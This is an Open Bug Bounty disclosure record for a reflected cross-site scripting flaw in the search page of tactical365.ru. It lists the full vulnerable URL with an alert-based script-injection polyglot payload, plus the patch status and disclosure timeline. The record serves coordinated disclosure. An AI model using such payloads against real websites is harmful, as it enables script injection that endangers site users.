tactical365.ru XSS vulnerability

2017-02-27T02:18:00
ID OBB:215565
Type openbugbounty
Reporter OmniGooch
Modified 2017-06-06T21:42:00

Description

Vulnerable URL:
http://tactical365.ru/magazin/search?sort_by=&search;_text=%27;alert(/XSSPOSED/)/%27;alert(/XSSPOSED/)/%22;alert(/XSSPOSED/)/%22;alert(/XSSPOSED/)/--%3E%3C/sCRipT%3E%22%3E%27%3E%3CsCRipT%3Ealert(/XSSPOSED/)%3C/sCRipT%3E
Details:

Description| Value
---|---
Patched:| Yes, at 06.06.2017
Latest check for patch:| 06.06.2017 05:26 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1264492
VIP website status:| No
Check tactical365.ru SSL connection:| (Grade: B)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 27 February, 2017 02:18 GMT
Generic security notifications sent to website owner| 27 February, 2017 02:20 GMT
Vulnerability details disclosed by researcher| 6 March, 2017 03:14 GMT
Vulnerability patched by the website owner| 6 June, 2017 21:42 GMT